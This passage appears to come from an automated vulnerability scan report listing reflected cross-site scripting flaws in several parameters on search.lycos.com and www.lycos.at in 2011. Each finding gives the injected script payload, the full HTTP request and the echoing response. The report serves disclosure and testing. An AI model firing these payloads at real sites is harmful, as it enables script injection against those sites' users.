This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?e9be9"><script>alert(1)</script>3e6249bcdc4=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:12 GMT; path=/
Set-Cookie: LYCOS_SEARCH=ui1o7s14njsg0a3gcq4g4tjrk1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?e9be9"><script>alert(1)</script>3e6249bcdc4=1&diktfc=2B57C99267C3BB3AB84E408578CBAC3EF52B542AF4EE&mobile=1">
...[SNIP]...

1.288. http://search.lycos.com/ [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75975"><script>alert(1)</script>6c6e640c41d was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?src=LYCOS50&query=75975"><script>alert(1)</script>6c6e640c41d HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:18 GMT; path=/
Set-Cookie: LYCOS_SEARCH=a7jqf2o9trkq33mjlrtdhcmgs1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PARTNER=lycos50
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search Resu
...[SNIP]...
<a href="http://search.lycos.com/?src=LYCOS50&query=75975"><script>alert(1)</script>6c6e640c41d&diktfc=A3B554BD102E2D83F1395F90E8ACDF586D8AACE8DC18&mobile=1">
...[SNIP]...

1.289. http://search.lycos.com/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4774"><script>alert(1)</script>de363e9cc4d was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?src=LYCOS50f4774"><script>alert(1)</script>de363e9cc4d&query= HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:17 GMT; path=/
Set-Cookie: LYCOS_SEARCH=j2co10c00q05ao63t7a5jgm8e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PARTNER=lycos50f4774%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ede363e9cc4d
Set-Cookie: PARTNER=deleted; expires=Sun, 07-Feb-2010 15:24:16 GMT
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?src=LYCOS50f4774"><script>alert(1)</script>de363e9cc4d&query=&diktfc=761A6929C5442BEE59CAA6139134CCACAA19EB73D471&mobile=1">
...[SNIP]...

1.290. http://search.lycos.com/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c0d5"><script>alert(1)</script>7685ded7554 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?tab=web9c0d5"><script>alert(1)</script>7685ded7554 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:19 GMT; path=/
Set-Cookie: LYCOS_SEARCH=eace7dic8bq4v0e2qhi7rqe8v7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_web9c0d5"><script>alert(1)</script>7685ded7554&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.291. http://search.lycos.com/image/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43791"%3balert(1)//d9279e4be1f was submitted in the cat parameter. This input was echoed as 43791";alert(1)//d9279e4be1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /image/?tab=multi&cat=images43791"%3balert(1)//d9279e4be1f HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:31 GMT; path=/
Set-Cookie: LYCOS_SEARCH=5m9teqd1e7d8kuou5aessesri1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_images43791";alert(1)//d9279e4be1f";
//-->
...[SNIP]...

1.292. http://search.lycos.com/image/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d400"><script>alert(1)</script>04436fbd937 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /image/?tab=multi&cat=images3d400"><script>alert(1)</script>04436fbd937 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:30 GMT; path=/
Set-Cookie: LYCOS_SEARCH=ldvud0eepml0vstmc33qlqegp2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images3d400"><script>alert(1)</script>04436fbd937&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.293. http://search.lycos.com/image/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81b13"><script>alert(1)</script>4decd24c467 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /image/?81b13"><script>alert(1)</script>4decd24c467=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:27 GMT; path=/
Set-Cookie: LYCOS_SEARCH=en9m4qp7l5qdk9naigf89kr9b3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?81b13"><script>alert(1)</script>4decd24c467=1&diktfc=7CBE54719741B0F72BA55F284533AF4F1E949604FE02&mobile=1">
...[SNIP]...

1.294. http://search.lycos.com/image/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /image/

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 647e3"><script>alert(1)</script>8c865f2d222 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /image/?tab=multi647e3"><script>alert(1)</script>8c865f2d222&cat=images HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:29 GMT; path=/
Set-Cookie: LYCOS_SEARCH=r3tgvh6jeasitmtraofqqkd521; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multi647e3"><script>alert(1)</script>8c865f2d222&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.295. http://search.lycos.com/video/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00d3"%3balert(1)//19c367855c0 was submitted in the cat parameter. This input was echoed as b00d3";alert(1)//19c367855c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/?tab=multi&cat=videob00d3"%3balert(1)//19c367855c0 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:31 GMT; path=/
Set-Cookie: LYCOS_SEARCH=mv7t2v9cb7e6jmrr9uae88l2k1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<!--
var cm_host = "multimedia.lycos.com";
var cm_taxid = "/results_videob00d3";alert(1)//19c367855c0";
//-->
...[SNIP]...

1.296. http://search.lycos.com/video/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7022"><script>alert(1)</script>2066ac00765 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /video/?tab=multi&cat=videof7022"><script>alert(1)</script>2066ac00765 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:31 GMT; path=/
Set-Cookie: LYCOS_SEARCH=5v26taejkg6hrvenn2penr4js5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_videof7022"><script>alert(1)</script>2066ac00765&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.297. http://search.lycos.com/video/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22399"><script>alert(1)</script>eb4d51ae47e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /video/?22399"><script>alert(1)</script>eb4d51ae47e=1 HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:29 GMT; path=/
Set-Cookie: LYCOS_SEARCH=d8jtk82lnbuvgpa2un328jp885; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://search.lycos.com/?22399"><script>alert(1)</script>eb4d51ae47e=1&diktfc=CBA540D2A67B2A655A0D21D611F27D39EF126CA3CA03&mobile=1">
...[SNIP]...

1.298. http://search.lycos.com/video/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.lycos.com
Path:   /video/

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db38"><script>alert(1)</script>0bdbb3d2807 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /video/?tab=multi4db38"><script>alert(1)</script>0bdbb3d2807&cat=video HTTP/1.1
Host: search.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:24:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:24:30 GMT; path=/
Set-Cookie: LYCOS_SEARCH=nbn9glms4m2vil1o58s7d03gg2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Search</tit
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multi4db38"><script>alert(1)</script>0bdbb3d2807&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

1.299. http://www.lycos.at/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.at
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e6bc"><script>alert(1)</script>617ee62cbd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?4e6bc"><script>alert(1)</script>617ee62cbd1=1 HTTP/1.1
Host: www.lycos.at
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161733398; path=/
Date: Mon, 07 Feb 2011 14:52:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:31 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="de">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?4e6bc"><script>alert(1)</script>617ee62cbd1=1&diktfc=89CB850B7B6CDECF10AF682AEDC184BAA8E73B509B27&mobile=1">
...[SNIP]...

1.300. http://www.lycos.at/ [utm_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.at
Path:   /

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e56e6"><script>alert(1)</script>8888e131586 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?utm_source=lycoshome&utm_campaign=home_flagse56e6"><script>alert(1)</script>8888e131586&utm_medium=footer HTTP/1.1
Host: www.lycos.at
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161732309; path=/
Date: Mon, 07 Feb 2011 14:52:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="de">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?utm_source=lycoshome&utm_campaign=home_flagse56e6"><script>alert(1)</script>8888e131586&utm_medium=footer&diktfc=6B2BA67E858B385A8827A328762C53997CC7E7ECACC4&mobile=1">
...[SNIP]...

1.301. http://www.lycos.at/ [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.at
Path:   /

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19993"><script>alert(1)</script>ecba6dbeeb4 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer19993"><script>alert(1)</script>ecba6dbeeb4 HTTP/1.1
Host: www.lycos.at
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R3839806000; path=/
Date: Mon, 07 Feb 2011 14:52:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:52:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="de">
<head>
<title>Lycos</
...[SNIP]...
<a href="/?utm_source=lycoshome&utm_campaign=home_flags&utm_medium=footer19993"><script>alert(1)</script>ecba6dbeeb4&diktfc=ABF98913624707CA12A71CD65C0023955CF8862236F0&mobile=1">
...[SNIP]...

1.302. http://www.lycos.at/ [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lycos.at
Path:   /

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7650e"><script>alert(1)</script>91f57f72591 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

